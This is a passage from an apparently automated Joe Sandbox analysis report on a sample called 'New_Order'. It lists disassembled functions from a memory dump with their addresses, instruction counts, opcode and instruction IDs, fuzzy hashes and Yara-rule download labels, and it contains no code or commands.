                                                                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                • Instruction Fuzzy Hash: 7101F9312246869BD726DB1DC849F99FBD8FF41794F084079FB048F691D6B5C810C650
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013561E5 Relevance: .0, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d8949dedafec25c8190e88ccbd365e7b47b2e52d51d436c86fd1c648d7d12440
                                                                                                • Instruction ID: f7129be72bf56d335d01114d74c4f8c7d27147c376afcd07a60ed6fed6f4debe
                                                                                                • Opcode Fuzzy Hash: d8949dedafec25c8190e88ccbd365e7b47b2e52d51d436c86fd1c648d7d12440
                                                                                                • Instruction Fuzzy Hash: 3D018F71A102499BDB00DFA9D851AEEBBF8BF58714F14405AE900AB280D734EA01CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013063C0 Relevance: .0, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                • Instruction ID: 3948a499a7cb7f68f936d20eecd57846ea06afd4bd2bf8b2094b163385140376
                                                                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                • Instruction Fuzzy Hash: 2FF0627210001DBFEF029F94CD80DBF7BBDEB54298B114124FA0092060D231DD21A7A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a8f75439202b0de02ab11aa1fe132310a955ed9a0f81016fe97be4dcaa931306
                                                                                                • Instruction ID: 9c8fcb1bcf6cb9295f62bc26441997ed9f0e7ea59d6d78162ff8ebf34acd8238
                                                                                                • Opcode Fuzzy Hash: a8f75439202b0de02ab11aa1fe132310a955ed9a0f81016fe97be4dcaa931306
                                                                                                • Instruction Fuzzy Hash: 3B018C36100209EBCF129E84D840EDA3FA6FB4C754F058111FE1866260C336D970EB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a63231339bb8acf08caf50b6f2ffb0efb0aa4d316a5e51d7d6f968445d37aae0
                                                                                                • Instruction ID: 73c3202d2e155d442ea1928e392b5fa91de3227555c2b0adb48a86295873b8e8
                                                                                                • Opcode Fuzzy Hash: a63231339bb8acf08caf50b6f2ffb0efb0aa4d316a5e51d7d6f968445d37aae0
                                                                                                • Instruction Fuzzy Hash: C0F0F0722742435BF7509629BC42B33369AE7D0655F65803AEF058B2C1E9B0D811C394
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B656A Relevance: .0, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6422e5dbd0be33327ac6117015677a9f1e609ea343b636075e6409f8a331a582
                                                                                                • Instruction ID: a5cd62c8a23e5c48dcf6717af186460c99f44a4e4b6ad098ab45772218ecb71f
                                                                                                • Opcode Fuzzy Hash: 6422e5dbd0be33327ac6117015677a9f1e609ea343b636075e6409f8a331a582
                                                                                                • Instruction Fuzzy Hash: 580186702246C29BE736A72CDD58B767798BB40B44F540164BB018B6D6E7A8D4018710
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0132437C Relevance: .0, Instructions: 37COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                • Instruction ID: 27ed152d954547785d5cebb3df2a9f1cd85ff5547980573802ff1c5144ed56ac
                                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                • Instruction Fuzzy Hash: DAF0E93134193347EB36BA2DC420B3AA655AF90E44B05452CD742CB640DF20DC108780
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130E872 Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                • Instruction ID: 0688d0e70d9cfebe4c47ee141af1ebbc467b5309782bf4f96e3f6d89b04fa9a1
                                                                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                • Instruction Fuzzy Hash: F6F0E9337105619BE7328A4DCC90F12BBE8EFD5E60F1D0434A6049B6A0C360ED01C7D0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130C89D Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2928a2daf825e255386d9a7589b3329098940b6169ceb039be35176ce52e0f9c
                                                                                                • Instruction ID: 8f8d8c12c9f34b163d71cb2aa11eaa9665d2888e7572a6aee6dc1a975c0f8a95
                                                                                                • Opcode Fuzzy Hash: 2928a2daf825e255386d9a7589b3329098940b6169ceb039be35176ce52e0f9c
                                                                                                • Instruction Fuzzy Hash: EBF0AF716157449FC310EF28C851A2BBBE4FF98714F40465EB998DB3D4E634EA00CB96
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B0854 Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                • Instruction ID: 1961fbd37554b42e978ebaad2096feeffb4f2190778cc637d9749d19de9b37a3
                                                                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                • Instruction Fuzzy Hash: 3CF0B472620205AFE715DB26CC41F97B6F9EF98350F148078A645D7160FAB1DE41C658
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01308D20 Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c1f5b5b28e938c76adb9869927d1f439317667e5f494a2565f294b1453a40992
                                                                                                • Instruction ID: ffe8d6e03aafc407134e6b7f519912747ac4307daf63e1ee04250d30e37e0574
                                                                                                • Opcode Fuzzy Hash: c1f5b5b28e938c76adb9869927d1f439317667e5f494a2565f294b1453a40992
                                                                                                • Instruction Fuzzy Hash: 79F08936910248ABD7377A1CEC54B5BBBADFB94728F490655F945272A1C7346C80C790
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130C912 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a8201d24b3b7e8dda3115b5354e84c87515f85cc88b5d08dfbcbaad210c23172
                                                                                                • Instruction ID: 72b24f90fead2c0055a2853726473e707b4e83fd70ac8077f6564e4e007d5e63
                                                                                                • Opcode Fuzzy Hash: a8201d24b3b7e8dda3115b5354e84c87515f85cc88b5d08dfbcbaad210c23172
                                                                                                • Instruction Fuzzy Hash: 66F0C270A1024DDFCB04EF69C521AAEB7F4FF18304F008159B905EB385DA34EA01CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012847FB Relevance: .0, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 38aec31083ea7bd0093033bcf68a404387ca147965c8bdb8a648890c45468969
                                                                                                • Instruction ID: f2e13c1e7e6bfd661cf1e6f2c55d4488460962388afd3a3af42b64bd4713b318
                                                                                                • Opcode Fuzzy Hash: 38aec31083ea7bd0093033bcf68a404387ca147965c8bdb8a648890c45468969
                                                                                                • Instruction Fuzzy Hash: 2DF0BE319376E39FE732FB6CC844B21BBD49B00A3CF0D896ADA89875C2C764D880C651
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01340115 Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 32c7d7cbc0346a8f77921cca6af12040240a3013880aec37ced4b6c07ad4361e
                                                                                                • Instruction ID: 61bc9a226f62a425d323e2a363d620b586fd0f45316d2bcad80fb567b49d2c7e
                                                                                                • Opcode Fuzzy Hash: 32c7d7cbc0346a8f77921cca6af12040240a3013880aec37ced4b6c07ad4361e
                                                                                                • Instruction Fuzzy Hash: 22F05CBE515BC04BDF366B3C74663D17F9CA78221CF091445D5A257205C578A483C324
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BC5ED Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 65d1e9e0d13149cc6d931ed74b02e1c600be88e68a327035651197f5a2757cca
                                                                                                • Instruction ID: 195115485e56abc80c2090b3b5924ed2208c9feb48e8867c73b578690a4c85a6
                                                                                                • Opcode Fuzzy Hash: 65d1e9e0d13149cc6d931ed74b02e1c600be88e68a327035651197f5a2757cca
                                                                                                • Instruction Fuzzy Hash: 2CF0E271A316929FE722971CC1C8FA17BD49FC07E4F08E465DA16C7652C260E8A0CA51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2619 Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                • Instruction ID: 684f946a3a0bb8023f13fa79e9ff295ce10498157b64b8f7d88fced223ecc343
                                                                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                • Instruction Fuzzy Hash: 2EE09232310A016BEB129E598C80F67776E9F92B10F14017DB7045E251C9E29C0982A4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01316030 Relevance: .0, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                • Instruction ID: be5f2a13acd3d9d10d69c8ae9cbbad4962669e840417848270c60cf749cbfdf6
                                                                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                • Instruction Fuzzy Hash: FAF030B2118604DFE7258F89D945F52B7F8EB05368F46C026E6099B561D3BAEC40CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01280710 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                • Instruction ID: 069ee351c55d73bf4e3098d7850015c1358555b6db997998fa72714aa3813cf9
                                                                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                • Instruction Fuzzy Hash: D3F0E5392657419BEB1AEF19C050AA57BA4FB51350B060054F9468B381E771E981CB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B49D0 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                • Instruction ID: c3737110cb9b35d7c7758e33cb9401d8d80b25a54ea9d8487f06128d230077f5
                                                                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                • Instruction Fuzzy Hash: B2E092323741C6ABD7223A5988A1BA676A59BD87E0F150429E2428B252DBB0EC40C798
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0132678E Relevance: .0, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                • Instruction ID: f13e1cbaa85d56dc2ef3573a2e666628b8879c535e92e2fead86f41071d3d094
                                                                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                • Instruction Fuzzy Hash: 63E0DF72A00120BBDF22A79D8D02FAABEACDF90FA4F050065FA01E7090E530DE00C690
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012825E0 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 1565673c0cb301dcfa0505c794bddbc4ad885607f73aeeac782db4f1afbe152f
                                                                                                • Instruction ID: 6bd8daf595f161c2bbafdd687bf9a0f1df96c3ae64cc01e5bcc5a63211b4e22d
                                                                                                • Opcode Fuzzy Hash: 1565673c0cb301dcfa0505c794bddbc4ad885607f73aeeac782db4f1afbe152f
                                                                                                • Instruction Fuzzy Hash: C3E092721109949BC721FB29DD01FAA7B9AEB60764F014619F11557190CA30A910C784
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0133A456 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                • Instruction ID: 40c10da89b1bc2c9a9c9a5412fd9036384eb1d29347b3eb3f738623fa7f3db8e
                                                                                                • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                • Instruction Fuzzy Hash: 4CE09231020A51DFE7366F2AD958B62BAE0BF90715F148C2CE1DA625B0C77598C1CB44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01304000 Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                • Instruction ID: 848bdd5870915c837614984c86ab1d89b1d60d2db1ada829d7e2f30a5a74edca
                                                                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                • Instruction Fuzzy Hash: 4FE0C2343003068FE716CF19C050B62BBF6BFD5A14F28C068AA488F245EB32E942CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127823B Relevance: .0, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                • Instruction ID: 25498e18a35bc9e772d8ea7f49449465e2c5ff19c6e13fb784fce597720ef791
                                                                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                • Instruction Fuzzy Hash: E9E0C231130A91EFDB322F2ADC04F6276A5FF54F11F11492DE28A064A48BB0AC81CB44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01282050 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9148d9eb1778ab36c7bca39592b3406fbbd21655c28ef47618327cebc516ad8d
                                                                                                • Instruction ID: 3e7e6ca8517a784e6d1f56a7a5610f43012903853117f3cafc1c8661e61aa1cf
                                                                                                • Opcode Fuzzy Hash: 9148d9eb1778ab36c7bca39592b3406fbbd21655c28ef47618327cebc516ad8d
                                                                                                • Instruction Fuzzy Hash: 50E0C2321118A0ABC721FB6DDD11F6A779EEFA4370F000221F154876D0CA20AD00C794
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B8A90 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                • Instruction ID: 9a6a1cb12105aa78e1eb95723b94c0ffa57696b8b7472eab93dfb19cc69462e1
                                                                                                • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                • Instruction Fuzzy Hash: B1E08633125A1487C728EE18D552BB277A8EF45760F09463EA61747780C534E544CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012D6AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                • Instruction ID: 738bc9da60a1c0b003fabc6a958538381aad1ffb66a2c73427fe3c505a01aa5e
                                                                                                • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                • Instruction Fuzzy Hash: 37D05E36521A50AFC7329F1BEA00C13BBF9FBD4A10706062EE54583924C670A806CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BE59C Relevance: .0, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                • Instruction ID: cdde8c1fd519a607b1dc3cda49c3afa2864dcc683e101b1195c0b7e647350a38
                                                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                • Instruction Fuzzy Hash: 6ED0A932224A60ABDB32AA2CFC00FD373E8BB88720F060469F108C7051C360AC81CA84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012FE908 Relevance: .0, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                • Instruction ID: bcc436dbe6e2be87fd38d362f11939936840ef04b059f87b7b615752d05eba99
                                                                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                • Instruction Fuzzy Hash: 13E0EC359606859FDF13EF59C640F5EBBB9BB95B40F160058A2085B670C624AD00CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
